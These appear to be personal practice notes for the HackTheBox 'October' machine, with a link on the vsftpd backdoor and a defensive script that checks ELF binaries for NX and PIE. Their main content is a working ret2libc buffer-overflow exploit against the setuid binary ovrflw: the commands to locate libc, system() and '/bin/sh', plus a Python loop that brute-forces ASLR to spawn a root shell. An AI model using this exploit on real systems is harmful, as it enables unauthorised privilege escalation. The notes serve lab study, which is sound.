Practice
vsftpd backdoor
- https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
HTB - October
/usr/local/bin/ovrflw
- NX/DEP is enabled.
- ASLR is enabled.
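A small check for those two properties, added here as an example and not part of the original notes: it parses the ELF header of a little-endian 32- or 64-bit binary and reports whether the stack is marked non-executable (a PT_GNU_STACK header without PF_X, i.e. NX) and whether the executable is position-independent (ET_DYN, so ASLR randomizes the image and not only the libraries); `build_elf32` constructs a minimal sample image so the check can run offline, and the `/proc/sys/kernel/randomize_va_space` read reports the system-wide ASLR setting. A non-PIE 32-bit binary under ASLR leaves only the library base to guess, which is the gap the brute force further down relies on; building with PIE closes it.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551   # program header that carries the stack's permissions
PF_X = 0x1                  # executable bit in p_flags
ET_DYN = 3                  # shared object / PIE executable (ET_EXEC = 2 is fixed-address)

def elf_mitigations(data):
    """Report NX and PIE status for a little-endian ELF image given as bytes."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class = data[4]                                   # 1 = ELF32, 2 = ELF64
    e_type = struct.unpack_from("<H", data, 16)[0]
    if ei_class == 1:
        e_phoff = struct.unpack_from("<I", data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
        ph_fmt, flags_idx = "<IIIIIIII", 6               # p_flags is the 7th field of Elf32_Phdr
    elif ei_class == 2:
        e_phoff = struct.unpack_from("<Q", data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
        ph_fmt, flags_idx = "<IIQQQQQQ", 1               # p_flags is the 2nd field of Elf64_Phdr
    else:
        raise ValueError("bad EI_CLASS")
    nx = None   # None: no PT_GNU_STACK header at all, so the kernel default applies
    for i in range(e_phnum):
        ph = struct.unpack_from(ph_fmt, data, e_phoff + i * e_phentsize)
        if ph[0] == PT_GNU_STACK:
            nx = not (ph[flags_idx] & PF_X)
    return {"bits": 32 if ei_class == 1 else 64, "pie": e_type == ET_DYN, "nx": nx}

def system_aslr_level():
    """Return /proc/sys/kernel/randomize_va_space (2 = full ASLR), or None when unreadable."""
    try:
        with open("/proc/sys/kernel/randomize_va_space") as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None

def build_elf32(e_type, stack_flags):
    """Construct a minimal ELF32 image with one PT_GNU_STACK header (test sample, not a real binary)."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # ELF32, little-endian, version 1
    # e_type, e_machine=EM_386, e_version, e_entry, e_phoff=52, e_shoff, e_flags,
    # e_ehsize=52, e_phentsize=32, e_phnum=1, e_shentsize, e_shnum, e_shstrndx
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0, 52, 0, 0, 52, 32, 1, 40, 0, 0)
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr

if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    image = open(path, "rb").read() if path else build_elf32(2, 0x6)   # constructed RW-stack sample
    print(elf_mitigations(image), "randomize_va_space:", system_aslr_level())
```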
Passing a pattern to the binary in gdb shows that there are 112 bytes of padding before the buffer overflows and the saved EIP is overwritten.
- Path and libc base address: `ldd /usr/local/bin/ovrflw | grep libc`
- system offset: `readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system`
- "/bin/sh" offset: `strings -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh`
- Payload: JUNK112 + libcAddress + JUNK8 + binShAddress
Brute forces the binary to bypass ASLR. Note it may take hundreds if not several thousand attempts to hit the correct address.
```python
import struct
import subprocess

# Values taken from the target: libc base seen via ldd, offsets via readelf/strings
libcBase = 0xb75eb000
systemOffset = 0x00040310
binShOffset = 0x00162bac

libcAddress = struct.pack("<I", libcBase + systemOffset)  # address of system(), overwrites saved EIP
exitAddress = struct.pack("<I", 0xd34db33f)                # fake return address for system()
binShAddress = struct.pack("<I", libcBase + binShOffset)   # pointer to "/bin/sh", argument to system()

payload = b"\x90" * 112   # padding up to the saved EIP
payload += libcAddress
payload += exitAddress
payload += binShAddress

i = 0
while True:
    i += 1
    if i % 10 == 0:
        print("Attempts: " + str(i))
    # each run sees a different libc base; the guess only lands when the base matches libcBase
    subprocess.call(["/usr/local/bin/ovrflw", payload])
```